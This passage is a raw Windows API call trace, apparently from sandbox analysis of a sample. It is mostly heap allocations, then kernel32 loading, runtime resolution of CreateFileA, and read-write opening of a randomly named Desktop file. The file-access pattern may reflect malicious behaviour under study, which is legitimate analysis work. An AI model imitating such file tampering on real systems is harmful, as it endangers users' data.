0x8e18c0 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0162.453] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0162.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0162.456] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.459] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba078 [0162.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba078, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0162.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.460] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0162.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0162.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0162.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.461] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0162.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0162.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0162.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0162.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0162.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x35) returned 0x90ad98 [0162.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", cchWideChar=53, lpMultiByteStr=0x90ad98, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpUsedDefaultChar=0x0) returned 53 [0162.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.463] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkicocoalm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0162.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0162.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0162.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=53, lpWideCharStr=0x906f38, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS 